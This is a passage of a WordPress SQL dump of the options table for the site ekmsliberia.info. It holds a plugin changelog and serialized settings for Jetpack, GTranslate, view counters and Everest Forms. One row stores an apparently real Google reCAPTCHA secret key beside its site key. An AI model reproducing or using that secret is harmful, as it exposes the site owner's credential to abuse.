functionality<\\/li>\\n<li>Adds filter hook <code>usp_filter_posts_link<\\/code><\\/li>\\n<li>Adds support for &quot;Non-USP&quot; post filter button<\\/li>\\n<li>Fixes bug with characters removed from email alerts<\\/li>\\n<li>Fixes bug with multiple files and custom fields<\\/li>\\n<li>Fixes bug with <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-featured-image-key\\/\\\">featured image key<\\/a> not working<\\/li>\\n<li>Fixes bug where WP file editor could not save file changes<\\/li>\\n<li>Fixes bug with WP Site Health (Loopback requests and REST API)<\\/li>\\n<li>Adds filter hook <code>usp_get_file_name<\\/code> for <code>insert_attachments()<\\/code><\\/li>\\n<li>Improves handling of PHP sessions<\\/li>\\n<li>Updates some links to https<\\/li>\\n<li>Generates new default translation template<\\/li>\\n<li>Tests on WordPress 5.3 (alpha)<\\/li>\\n<\\/ul>\\n<p><strong>3.3<\\/strong><\\/p>\\n<ul>\\n<li>Refines USP License screen UI<\\/li>\\n<li>Fixes PHP warning for <code>count()<\\/code><\\/li>\\n<li>Fixes security issue with uploaded images on Apache + FastCGI<\\/li>\\n<li>Adds <code>default<\\/code> attribute for &quot;Agree to Terms&quot; checkbox<\\/li>\\n<li>Improves form posting for Login\\/Register form<\\/li>\\n<li>Bumps <a href=\\\"https:\\/\\/codex.wordpress.org\\/Template:Server_requirements\\\">minimum PHP version<\\/a> to 5.6.20<\\/li>\\n<li>Updates default translation template<\\/li>\\n<li>Tests on WordPress 5.2<\\/li>\\n<\\/ul>\\n<p><strong>3.2.1<\\/strong><\\/p>\\n<ul>\\n<li>Adds another security check for uploaded files (Thanks to Matthias)<\\/li>\\n<li>Tests on WordPress 5.1 and 5.2 (beta)<\\/li>\\n<\\/ul>\\n<p><strong>3.2<\\/strong><\\/p>\\n<ul>\\n<li>Deprecates reCaptcha &quot;Version 1&quot;<\\/li>\\n<li>Removes deprecated (old) reCaptcha<\\/li>\\n<li>Changes default reCaptcha option to &quot;Version 2&quot;<\\/li>\\n<li>Improves display of plugin License screen<\\/li>\\n<li>Improves functionality for one-click plugin updates<\\/li>\\n<li>Fixes bug with timeouts with <code>usp_pro_display_posts<\\/code><\\/li>\\n<li>Provides shortcode for adding <code>#<\\/code> to custom field values<\\/li>\\n<li>Adds <code>url<\\/code> to allowed attributes in <code>sanitize_content()<\\/code><\\/li>\\n<li>Adds check for admin user for settings shortcut link<\\/li>\\n<li>Removes deprecated functions from About tab<\\/li>\\n<li>Refines plugin settings screen UI<\\/li>\\n<li>Generates new default translation template<\\/li>\\n<li>Tests on WordPress 5.1 and 5.2 (alpha)<\\/li>\\n<\\/ul>\\n<p><strong>3.1<\\/strong><\\/p>\\n<ul>\\n<li>Adds shortcode <code>[usp_user_avatar]<\\/code><\\/li>\\n<li>Adds email alert shortcode <code>%%post_slug%%<\\/code><\\/li>\\n<li>Updates plugin settings page details<\\/li>\\n<li>Updates default translation template<\\/li>\\n<li>Tests on WordPress 5.0 (beta)<\\/li>\\n<\\/ul>\\n<p><strong>3.0<\\/strong><\\/p>\\n<ul>\\n<li>Adds additional <code>display<\\/code> options for <code>[usp_pro_display_posts]<\\/code><\\/li>\\n<li>Adds <code>cat=\\\"current\\\"<\\/code> support to <code>[usp_pro_display_posts]<\\/code> shortcode<\\/li>\\n<li>Adds <code>usp-login<\\/code> as <code>id<\\/code> attribute to login\\/register\\/password form<\\/li>\\n<li>Adds <code>rel=\\\"noopener noreferrer\\\"<\\/code> to all <a href=\\\"https:\\/\\/perishablepress.com\\/wordpress-blank-target-vulnerability\\/\\\">blank-target links<\\/a><\\/li>\\n<li>Replaces <code>sanitize_text_field<\\/code> with <code>wp_strip_all_tags<\\/code> for styles<\\/li>\\n<li>Bugfix: JavaScript error flashes as form submits<\\/li>\\n<li>Bugfix: &quot;USP&quot; filter posts button not working for Custom Post Types<\\/li>\\n<li>Bugfix: maxlength attribute for tag field incorrect<\\/li>\\n<li>Bugfix: several PHP Notices were eliminated<\\/li>\\n<li>Improves logic of <code>usp_pro_add_glance_items<\\/code> function<\\/li>\\n<li>Refines dashboard widget functionality<\\/li>\\n<li>Updates GDPR blurb and donate link<\\/li>\\n<li>Regenerates default translation template<\\/li>\\n<li>Further tests on WP versions 4.9 and 5.0 (alpha)<\\/li>\\n<\\/ul>\\n<p><strong>2.9<\\/strong><\\/p>\\n<ul>\\n<li>\\n<p>Adds filter hooks:<\\/p>\\n<ul>\\n<li><code>usp_display_errors<\\/code><\\/li>\\n<li><code>usp_display_errors_all<\\/code><\\/li>\\n<li><code>usp_display_errors_custom<\\/code><\\/li>\\n<li><code>usp_display_posts_args<\\/code><\\/li>\\n<li><code>usp_featured_image<\\/code><\\/li>\\n<li><code>usp_custom_value<\\/code><\\/li>\\n<li><code>usp_custom_custom_value<\\/code><\\/li>\\n<li><code>usp_attachments_postid<\\/code><\\/li>\\n<li><code>usp_max_users<\\/code><\\/li>\\n<li><code>usp_file_ids<\\/code><\\/li>\\n<li><code>usp_image_attachments<\\/code><\\/li>\\n<li><code>usp_file_attachments<\\/code><\\/li>\\n<li><code>usp_display_posts_default<\\/code><\\/li>\\n<li><code>usp_submit_post_after<\\/code><\\/li>\\n<li><code>usp_sanitize_content_kses<\\/code><\\/li>\\n<li><code>usp_widget_submitted_type<\\/code><\\/li>\\n<li><code>usp_widget_submitted_status<\\/code><\\/li>\\n<li><code>usp_alert_shortcut_attachment_args<\\/code><\\/li>\\n<\\/ul>\\n<\\/li>\\n<li>\\n<p>Adds disable-IP option (for example, to comply with GDPR)<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds email shortcode <code>%%post_author%%<\\/code> for Post Author<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds email shortcode <code>%%files%%<\\/code> for list of file URLs<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds submitted post count to &quot;At a Glance&quot; on the Dashboard<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds function to check and warn if free version is installed<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds support for shortcut variables in alert subject line<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds more attributes to <code>[usp_pro_display_posts]<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Adds <code>required<\\/code> attribute to <code>[usp_agree]<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Adds support for new Limit Posts extension<\\/p>\\n<\\/li>\\n<li>\\n<p>Changes input\\/label attributes on login\\/register form<\\/p>\\n<\\/li>\\n<li>\\n<p>Removes filter hook, <code>usp_shortcode_display_posts_type<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Removes filter hook, <code>usp_settings_author_list_args<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Updates deprecated <code>create_function<\\/code> for PHP 7.2<\\/p>\\n<\\/li>\\n<li>\\n<p>Improves Default Assigned Author setting<\\/p>\\n<\\/li>\\n<li>\\n<p>Limits default output of <code>usp_ids()<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Generates new translation template<\\/p>\\n<\\/li>\\n<li>\\n<p>Tests on WordPress 5.0<\\/p>\\n<\\/li>\\n<\\/ul>\\n<p><strong>Changelog for previous versions<\\/strong><\\/p>\\n<p>Available at Plugin Planet: <a href=\\\"https:\\/\\/plugin-planet.com\\/wp\\/files\\/usp-pro\\/changelog.txt\\\">USP Pro changelog<\\/a><\\/p>\\n<p>Also check out the <a href=\\\"https:\\/\\/plugin-planet.com\\/news\\/\\\">announcement posts for each new version<\\/a>.<\\/p>\"],\"plugin\":\"usp-pro\\/usp-pro.php\",\"id\":\"usp-pro\\/usp-pro.php\"}\";}','no'),(6231,'iclcat_161','a:0:{}','yes'),(6691,'oh_hooks_settings','a:0:{}','yes'),(6915,'owp_mailchimp_api_key','','yes'),(6916,'owp_mailchimp_list_id','','yes'),(6917,'owp_google_map_api','','yes'),(6918,'owp_recaptcha_site_key','6LeoC8MUAAAAAPOtNPH-VReL2HxyzuVPR5X0yjRn','yes'),(6919,'owp_recaptcha_secret_key','6LeoC8MUAAAAAKelrLO6OD_rxd6ttRyd_ek0kZTj','yes'),(6920,'owp_integrations','','yes'),(7049,'resource_type_children','a:0:{}','yes'),(7057,'hicpo_ver','3.1.5','yes'),(7060,'hicpo_options','a:2:{s:7:\"objects\";a:8:{i:0;s:4:\"post\";i:1;s:8:\"document\";i:2;s:13:\"ekms_bulletin\";i:3;s:11:\"institution\";i:4;s:16:\"knowledge_broker\";i:5;s:12:\"mea_resource\";i:6;s:16:\"project_resource\";i:7;s:13:\"related_topic\";}s:4:\"tags\";s:0:\"\";}','yes'),(7128,'do_activate','0','yes'),(7145,'jetpack_sync_full__started','1574159265','no'),(7146,'jetpack_sync_full__params','a:4:{s:7:\"options\";b:1;s:9:\"functions\";b:1;s:9:\"constants\";b:1;s:5:\"users\";a:1:{i:0;i:1;}}','no'),(7147,'jetpack_sync_full_config','a:4:{s:9:\"constants\";b:1;s:9:\"functions\";b:1;s:7:\"options\";b:1;s:5:\"users\";a:1:{i:0;i:1;}}','no'),(7148,'jetpack_sync_full_enqueue_status','a:4:{s:9:\"constants\";a:3:{i:0;i:1;i:1;i:1;i:2;b:1;}s:9:\"functions\";a:3:{i:0;i:1;i:1;i:1;i:2;b:1;}s:7:\"options\";a:3:{i:0;i:1;i:1;i:1;i:2;b:1;}s:5:\"users\";a:3:{i:0;i:1;i:1;i:1;i:2;b:1;}}','no'),(7176,'jetpack_sync_full__queue_finished','1574159265','yes'),(7213,'jpsq_sync_checkout','0:0','no'),(7216,'jetpack_plugin_api_action_links','a:7:{s:25:\"bit-social/bit-social.php\";a:2:{s:8:\"Settings\";s:78:\"https://ekmsliberia.info/wp-admin/wp-admin/admin.php?page=bit-social#/settings\";s:7:\"Support\";s:77:\"https://ekmsliberia.info/wp-admin/wp-admin/admin.php?page=bit-social#/support\";}s:35:\"ele-custom-skin/ele-custom-skin.php\";a:1:{s:17:\"Add Loop Template\";s:115:\"https://ekmsliberia.info/wp-admin/edit.php?post_type=elementor_library&tabs_group=theme&elementor_library_type=loop\";}s:43:\"ele-custom-skin-pro/ele-custom-skin-pro.php\";a:1:{s:17:\"Add Loop Template\";s:115:\"https://ekmsliberia.info/wp-admin/edit.php?post_type=elementor_library&tabs_group=theme&elementor_library_type=loop\";}s:31:\"everest-forms/everest-forms.php\";a:1:{s:8:\"Settings\";s:61:\"https://ekmsliberia.info/wp-admin/admin.php?page=evf-settings\";}s:25:\"gtranslate/gtranslate.php\";a:1:{s:8:\"Settings\";s:77:\"https://ekmsliberia.info/wp-admin/options-general.php?page=gtranslate_options\";}s:35:\"jetpack-protect/jetpack-protect.php\";a:1:{s:9:\"Dashboard\";s:64:\"https://ekmsliberia.info/wp-admin/admin.php?page=jetpack-protect\";}s:51:\"wordpress-popular-posts/wordpress-popular-posts.php\";a:2:{s:8:\"Settings\";s:82:\"https://ekmsliberia.info/wp-admin/options-general.php?page=wordpress-popular-posts\";s:7:\"Support\";s:61:\"https://wordpress.org/support/plugin/wordpress-popular-posts/\";}}','yes'),(7223,'jpsq_full_sync_checkout','0:0','no'),(7233,'trusted_ip_header','O:8:\"stdClass\":3:{s:14:\"trusted_header\";s:11:\"REMOTE_ADDR\";s:8:\"segments\";i:1;s:7:\"reverse\";b:0;}','no'),(7250,'jetpack_sync_full__send_started','1574159276','no'),(7251,'jetpack_sync_full__constants_sent','1','no'),(7252,'jetpack_sync_full__constants_sent_total','-1','no'),(7253,'jetpack_sync_full__functions_sent','1','no'),(7254,'jetpack_sync_full__functions_sent_total','-1','no'),(7255,'jetpack_sync_full__options_sent','1','no'),(7256,'jetpack_sync_full__options_sent_total','-1','no'),(7257,'jetpack_sync_full__users_sent','1','no'),(7258,'jetpack_sync_full__users_sent_total','1','no'),(7259,'jetpack_sync_full__finished','1574159276','no'),(7271,'post_by_email_address1','NULL','yes'),(7272,'monitor_receive_notifications','1','yes'),(7283,'dismiss_empty_stats_card','1','yes'),(7327,'verification_services_codes','0','yes'),(7469,'stats_cache','a:2:{s:32:\"1fd668510ea4d972f2f8093b3a154c7a\";a:1:{i:1781024409;a:6:{i:0;a:4:{s:7:\"post_id\";s:1:\"9\";s:10:\"post_title\";s:4:\"Home\";s:14:\"post_permalink\";s:25:\"https://ekmsliberia.info/\";s:5:\"views\";s:1:\"5\";}i:1;a:4:{s:7:\"post_id\";s:1:\"0\";s:10:\"post_title\";s:9:\"Home page\";s:14:\"post_permalink\";s:25:\"https://ekmsliberia.info/\";s:5:\"views\";s:1:\"3\";}i:2;a:4:{s:7:\"post_id\";s:4:\"5895\";s:10:\"post_title\";s:15:\"Project Manager\";s:14:\"post_permalink\";s:55:\"https://ekmsliberia.info/ekms-bulletin/project-manager/\";s:5:\"views\";s:1:\"3\";}i:3;a:4:{s:7:\"post_id\";s:4:\"2148\";s:10:\"post_title\";s:22:\"Signed Land Rights Act\";s:14:\"post_permalink\";s:57:\"https://ekmsliberia.info/document/signed-land-rights-act/\";s:5:\"views\";s:1:\"2\";}i:4;a:4:{s:7:\"post_id\";s:2:\"89\";s:10:\"post_title\";s:22:\"Institutions Resources\";s:14:\"post_permalink\";s:48:\"https://ekmsliberia.info/institutions-resources/\";s:5:\"views\";s:1:\"2\";}i:5;a:4:{s:7:\"post_id\";s:4:\"2503\";s:10:\"post_title\";s:18:\"Join the Community\";s:14:\"post_permalink\";s:44:\"https://ekmsliberia.info/join-the-community/\";s:5:\"views\";s:1:\"1\";}}}s:32:\"bb4c8b4b03c9fbc737f39c515242f3f3\";a:1:{i:1781024409;a:0:{}}}','yes'),(12783,'wpcom_publish_posts_with_markdown','1','yes'),(13440,'feedback_unread_count','0','yes'),(22131,'widget_authors','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22132,'widget_eu_cookie_law_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22133,'widget_facebook-likebox','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22134,'widget_flickr','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22135,'widget_wpcom-goodreads','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22136,'widget_google_translate_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22137,'widget_grofile','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22138,'widget_internet_defense_league_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22139,'widget_widget_mailchimp_subscriber_popup','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22140,'widget_milestone_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22141,'widget_jetpack_my_community','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22142,'widget_rss_links','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22143,'widget_jetpack_widget_social_icons','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22144,'widget_twitter_timeline','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22145,'widget_upcoming_events_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22146,'widget_jetpack_display_posts_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22163,'widget_top-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(22269,'owp_dismiss_sticky_notice','1','yes'),(25886,'post_views_counter_settings_general','a:21:{s:16:\"post_types_count\";a:6:{i:0;s:8:\"document\";i:1;s:11:\"institution\";i:2;s:4:\"page\";i:3;s:4:\"post\";i:4;s:16:\"project_resource\";i:5;s:13:\"related_topic\";}s:16:\"taxonomies_count\";b:0;s:11:\"users_count\";b:0;s:11:\"other_count\";b:0;s:12:\"data_storage\";s:7:\"cookies\";s:11:\"amp_support\";b:0;s:12:\"counter_mode\";s:3:\"php\";s:17:\"post_views_column\";b:1;s:19:\"restrict_edit_views\";b:1;s:19:\"time_between_counts\";a:2:{s:6:\"number\";i:24;s:4:\"type\";s:5:\"hours\";}s:12:\"reset_counts\";a:2:{s:6:\"number\";i:30;s:4:\"type\";s:4:\"days\";}s:12:\"object_cache\";b:0;s:14:\"flush_interval\";a:2:{s:6:\"number\";i:0;s:4:\"type\";s:7:\"minutes\";}s:7:\"exclude\";a:2:{s:6:\"groups\";a:1:{i:0;s:5:\"users\";}s:5:\"roles\";a:0:{}}s:11:\"exclude_ips\";a:0:{}s:13:\"strict_counts\";b:0;s:8:\"cron_run\";b:1;s:11:\"cron_update\";b:0;s:14:\"update_version\";i:2;s:13:\"update_notice\";b:0;s:17:\"update_delay_date\";i:0;}','no'),(25887,'post_views_counter_settings_display','a:8:{s:5:\"label\";s:16:\"Number of Views:\";s:18:\"post_types_display\";a:5:{i:0;s:8:\"document\";i:1;s:11:\"institution\";i:2;s:4:\"post\";i:3;s:16:\"project_resource\";i:4;s:13:\"related_topic\";}s:18:\"page_types_display\";a:1:{i:0;s:8:\"singular\";}s:8:\"position\";s:6:\"before\";s:13:\"display_style\";a:2:{s:4:\"icon\";b:1;s:4:\"text\";b:1;}s:10:\"icon_class\";s:20:\"dashicons-visibility\";s:12:\"link_to_post\";b:1;s:16:\"restrict_display\";a:2:{s:6:\"groups\";a:0:{}s:5:\"roles\";a:0:{}}}','no'),(25888,'post_views_counter_version','1.4.3','no'),(25899,'widget_post_views_counter_list_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(27264,'wpp_settings_config','a:2:{s:5:\"stats\";a:7:{s:5:\"range\";s:9:\"last7days\";s:9:\"time_unit\";s:4:\"hour\";s:13:\"time_quantity\";s:2:\"24\";s:8:\"order_by\";s:5:\"views\";s:5:\"limit\";i:10;s:9:\"post_type\";s:9:\"post,page\";s:9:\"freshness\";b:0;}s:5:\"tools\";a:7:{s:4:\"ajax\";b:0;s:3:\"css\";b:1;s:4:\"link\";a:1:{s:6:\"target\";s:5:\"_self\";}s:9:\"thumbnail\";a:5:{s:6:\"source\";s:8:\"featured\";s:5:\"field\";s:0:\"\";s:6:\"resize\";b:0;s:7:\"default\";s:0:\"\";s:8:\"lazyload\";b:1;}s:3:\"log\";a:3:{s:5:\"level\";i:1;s:5:\"limit\";i:0;s:13:\"expires_after\";i:180;}s:5:\"cache\";a:2:{s:6:\"active\";b:1;s:8:\"interval\";a:2:{s:4:\"time\";s:6:\"minute\";s:5:\"value\";i:1;}}s:8:\"sampling\";a:2:{s:6:\"active\";b:0;s:4:\"rate\";i:100;}}}','yes'),(27265,'wpp_ver','6.4.0','yes'),(27275,'widget_wpp','a:2:{i:2;a:21:{s:5:\"title\";s:8:\"Trending\";s:5:\"limit\";s:1:\"5\";s:6:\"offset\";i:0;s:5:\"range\";s:5:\"daily\";s:9:\"time_unit\";s:4:\"hour\";s:13:\"time_quantity\";s:2:\"24\";s:9:\"freshness\";b:0;s:8:\"order_by\";s:5:\"views\";s:9:\"post_type\";s:4:\"post\";s:3:\"pid\";s:0:\"\";s:6:\"author\";s:0:\"\";s:3:\"cat\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:7:\"term_id\";s:0:\"\";s:13:\"shorten_title\";a:3:{s:6:\"active\";b:0;s:6:\"length\";i:25;s:5:\"words\";b:0;}s:12:\"post-excerpt\";a:4:{s:6:\"active\";b:0;s:6:\"length\";i:75;s:11:\"keep_format\";b:0;s:5:\"words\";b:0;}s:9:\"thumbnail\";a:5:{s:6:\"active\";b:0;s:5:\"build\";s:6:\"manual\";s:5:\"width\";i:75;s:6:\"height\";i:75;s:4:\"crop\";b:1;}s:6:\"rating\";b:0;s:9:\"stats_tag\";a:6:{s:13:\"comment_count\";b:0;s:5:\"views\";b:0;s:6:\"author\";b:0;s:4:\"date\";a:2:{s:6:\"active\";b:0;s:6:\"format\";s:6:\"F j, Y\";}s:8:\"category\";b:1;s:8:\"taxonomy\";a:2:{s:6:\"active\";b:0;s:4:\"name\";s:8:\"category\";}}s:6:\"markup\";a:6:{s:11:\"custom_html\";b:1;s:11:\"title-start\";s:41:\"&lt;h4 class=&quot;widget-title&quot;&gt;\";s:9:\"title-end\";s:11:\"&lt;/h4&gt;\";s:9:\"wpp-start\";s:34:\"<ul class=\"wpp-list wpp-midnight\">\";s:7:\"wpp-end\";s:5:\"</ul>\";s:9:\"post-html\";s:151:\"<li style=\"--item-position: {item_position}; --total-items: {total_items};\"><div class=\"item-position\"></div> <div class=\"item-data\">{title}</div></li>\";}s:5:\"theme\";a:2:{s:4:\"name\";s:8:\"midnight\";s:7:\"applied\";b:1;}}s:12:\"_multiwidget\";i:1;}','yes'),(27290,'wpp_rand','042e4ba47acd63c4629401b17ca06f0b','yes'),(27348,'wpp_transients','a:18:{i:0;s:32:\"a399ee8b836ea4c808415d25f3cac2f0\";i:1;s:32:\"8df6e81a7593670412c50f3bf6ab76c9\";i:2;s:32:\"fa66775601c93e81aa476c3408d01861\";i:3;s:32:\"0b18b40e2198640cd8a547f761a5275d\";i:4;s:32:\"0f579624e205d81c90aca52953f69f77\";i:5;s:32:\"6a397198db7b3d414dc68a96a068f0bc\";i:6;s:32:\"20367fd2f2a31c6de11e7ce02507419b\";i:7;s:32:\"81a66e18c3ef8bd135ae419d25340bf7\";i:8;s:32:\"c0ea1d52b3220d8aba68de79d9a2de49\";i:9;s:32:\"b6483c41ac570038e6be2d367b3d3a02\";i:10;s:32:\"30ac5774bb6896fde8edfa793a533af6\";i:11;s:32:\"c19715cb54f491c60bdd613cf756f75b\";i:12;s:32:\"935d55000694985fce4066195532d0c7\";i:13;s:32:\"d420aeb8caacfd4b6093113e8767ee9d\";i:14;s:36:\"wpp_bd08ade85c00e65064ed6754503c7a30\";i:15;s:32:\"bf738b949e164b2ad4e418e5c570bdd7\";i:16;s:32:\"3e286ff980f9130fe9c58cb3fe5fb965\";i:17;s:32:\"b96bc05d2a2156de52a7847d038dfe7e\";}','yes'),(28075,'GTranslate','a:36:{s:11:\"pro_version\";s:0:\"\";s:18:\"enterprise_version\";s:0:\"\";s:15:\"url_translation\";s:0:\"\";s:17:\"add_hreflang_tags\";s:0:\"\";s:10:\"new_window\";s:0:\"\";s:12:\"show_in_menu\";s:0:\"\";s:26:\"floating_language_selector\";s:2:\"no\";s:21:\"native_language_names\";s:0:\"\";s:9:\"analytics\";s:0:\"\";s:23:\"detect_browser_language\";s:0:\"\";s:12:\"add_new_line\";i:1;s:16:\"default_language\";s:2:\"en\";s:18:\"translation_method\";s:5:\"onfly\";s:11:\"widget_look\";s:5:\"flags\";s:9:\"flag_size\";i:24;s:11:\"widget_code\";s:2789:\"<!-- GTranslate: https://gtranslate.io/ -->\r\n<a href=\"#\" onclick=\"doGTranslate(\'en|en\');return false;\" title=\"English\" class=\"glink nturl notranslate\"><img src=\"//ekmsliberia.info/wp-content/plugins/gtranslate/flags/24/en.png\" height=\"24\" width=\"24\" alt=\"English\" /></a><a href=\"#\" onclick=\"doGTranslate(\'en|fr\');return false;\" title=\"French\" class=\"glink nturl notranslate\"><img src=\"//ekmsliberia.info/wp-content/plugins/gtranslate/flags/24/fr.png\" height=\"24\" width=\"24\" alt=\"French\" /></a><a href=\"#\" onclick=\"doGTranslate(\'en|es\');return false;\" title=\"Spanish\" class=\"glink nturl notranslate\"><img src=\"//ekmsliberia.info/wp-content/plugins/gtranslate/flags/24/es.png\" height=\"24\" width=\"24\" alt=\"Spanish\" /></a><style>#goog-gt-tt{display:none!important;}.goog-te-banner-frame{display:none!important;}.goog-te-menu-value:hover{text-decoration:none!important;}.goog-text-highlight{background-color:transparent!important;box-shadow:none!important;}body{top:0!important;}#google_translate_element2{display:none!important;}</style>\r\n<div id=\"google_translate_element2\"></div>\r\n<script>function googleTranslateElementInit2() {new google.translate.TranslateElement({pageLanguage: \'en\',autoDisplay: false}, \'google_translate_element2\');}if(!window.gt_translate_script){window.gt_translate_script=document.createElement(\'script\');gt_translate_script.src=\'https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2\';document.body.appendChild(gt_translate_script);}</script>\r\n\r\n<script>\r\nfunction GTranslateGetCurrentLang() {var keyValue = document[\'cookie\'].match(\'(^|;) ?googtrans=([^;]*)(;|$)\');return keyValue ? keyValue[2].split(\'/\')[2] : null;}\r\nfunction GTranslateFireEvent(element,event){try{if(document.createEventObject){var evt=document.createEventObject();element.fireEvent(\'on\'+event,evt)}else{var evt=document.createEvent(\'HTMLEvents\');evt.initEvent(event,true,true);element.dispatchEvent(evt)}}catch(e){}}\r\nfunction doGTranslate(lang_pair){if(lang_pair.value)lang_pair=lang_pair.value;if(lang_pair==\'\')return;var lang=lang_pair.split(\'|\')[1];if(GTranslateGetCurrentLang() == null && lang == lang_pair.split(\'|\')[0])return;if(typeof ga==\'function\'){ga(\'send\', \'event\', \'GTranslate\', lang, location.hostname+location.pathname+location.search);}var teCombo;var sel=document.getElementsByTagName(\'select\');for(var i=0;i<sel.length;i++)if(sel[i].className.indexOf(\'goog-te-combo\')!=-1){teCombo=sel[i];break;}if(document.getElementById(\'google_translate_element2\')==null||document.getElementById(\'google_translate_element2\').innerHTML.length==0||teCombo.length==0||teCombo.innerHTML.length==0){setTimeout(function(){doGTranslate(lang_pair)},500)}else{teCombo.value=lang;GTranslateFireEvent(teCombo,\'change\');GTranslateFireEvent(teCombo,\'change\')}}\r\n</script>\r\n\";s:10:\"incl_langs\";a:10:{i:0;s:2:\"ar\";i:1;s:5:\"zh-CN\";i:2;s:2:\"nl\";i:3;s:2:\"en\";i:4;s:2:\"fr\";i:5;s:2:\"de\";i:6;s:2:\"it\";i:7;s:2:\"pt\";i:8;s:2:\"ru\";i:9;s:2:\"es\";}s:11:\"fincl_langs\";a:3:{i:0;s:2:\"en\";i:1;s:2:\"fr\";i:2;s:2:\"es\";}s:9:\"alt_flags\";a:0:{}s:14:\"language_codes\";s:320:\"af,sq,am,ar,hy,az,eu,be,bn,bs,bg,ca,ceb,ny,zh-CN,zh-TW,co,hr,cs,da,nl,en,eo,et,tl,fi,fr,fy,gl,ka,de,el,gu,ht,ha,haw,iw,hi,hmn,hu,is,ig,id,ga,it,ja,jw,kn,kk,km,ko,ku,ky,lo,la,lv,lt,lb,mk,mg,ms,ml,mt,mi,mr,mn,my,ne,no,ps,fa,pl,pt,pa,ro,ru,sm,gd,sr,st,sn,sd,si,sk,sl,so,es,su,sw,sv,tg,ta,te,th,tr,uk,ur,uz,vi,cy,xh,yi,yo,zu\";s:15:\"language_codes2\";s:320:\"af,sq,am,ar,hy,az,eu,be,bn,bs,bg,ca,ceb,ny,zh-CN,zh-TW,co,hr,cs,da,nl,en,eo,et,tl,fi,fr,fy,gl,ka,de,el,gu,ht,ha,haw,iw,hi,hmn,hu,is,ig,id,ga,it,ja,jw,kn,kk,km,ko,ku,ky,lo,la,lv,lt,lb,mk,mg,ms,ml,mt,mi,mr,mn,my,ne,no,ps,fa,pl,pt,pa,ro,ru,sm,gd,sr,st,sn,sd,si,sk,sl,so,es,su,sw,sv,tg,ta,te,th,tr,uk,ur,uz,vi,cy,xh,yi,yo,zu\";s:17:\"email_translation\";s:0:\"\";s:23:\"email_translation_debug\";s:0:\"\";s:16:\"monochrome_flags\";s:0:\"\";s:19:\"switcher_text_color\";s:4:\"#666\";s:20:\"switcher_arrow_color\";s:4:\"#666\";s:21:\"switcher_border_color\";s:4:\"#ccc\";s:25:\"switcher_background_color\";s:4:\"#fff\";s:32:\"switcher_background_shadow_color\";s:7:\"#efefef\";s:31:\"switcher_background_hover_color\";s:4:\"#fff\";s:19:\"dropdown_text_color\";s:4:\"#000\";s:20:\"dropdown_hover_color\";s:4:\"#fff\";s:25:\"dropdown_background_color\";s:4:\"#eee\";s:14:\"custom_domains\";s:0:\"\";s:19:\"custom_domains_data\";s:0:\"\";s:10:\"flag_style\";s:2:\"3d\";}','yes'),(28085,'widget_gtranslate','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(28086,'gtranslate_admin_notice','a:2:{s:15:\"two_week_review\";a:3:{s:5:\"start\";s:9:\"12/2/2019\";s:3:\"int\";i:5;s:9:\"dismissed\";i:1;}s:12:\"upgrade_tips\";a:3:{s:5:\"start\";s:10:\"11/29/2019\";s:3:\"int\";i:2;s:9:\"dismissed\";i:1;}}','yes'),(29555,'widget_blog-stats','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(29556,'widget_widget_contact_info','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(29645,'everest_forms_disable_user_details','no','yes'),(29646,'everest_forms_recaptcha_type','v2','yes'),(29647,'everest_forms_recaptcha_v2_site_key','','yes'),(29648,'everest_forms_recaptcha_v2_secret_key','','yes'),(29649,'everest_forms_recaptcha_v2_invisible_site_key','','yes'),(29650,'everest_forms_recaptcha_v2_invisible_secret_key','','yes'),(29651,'everest_forms_recaptcha_v2_invisible','no','yes'),(29652,'everest_forms_recaptcha_v3_site_key','','yes'),(29653,'everest_forms_recaptcha_v3_secret_key','','yes'),(29654,'everest_forms_email_template','default','yes'),(29655,'everest_forms_enable_email_copies','no','yes'),(29656,'everest_forms_required_validation','This field is required.','yes'),(29657,'everest_forms_url_validation','Please enter a valid URL.','yes'),(29658,'everest_forms_email_validation','Please enter a valid email address.','yes'),(29659,'everest_forms_email_suggestion','Did you mean {suggestion}?','yes'),(29660,'everest_forms_number_validation','Please enter a valid 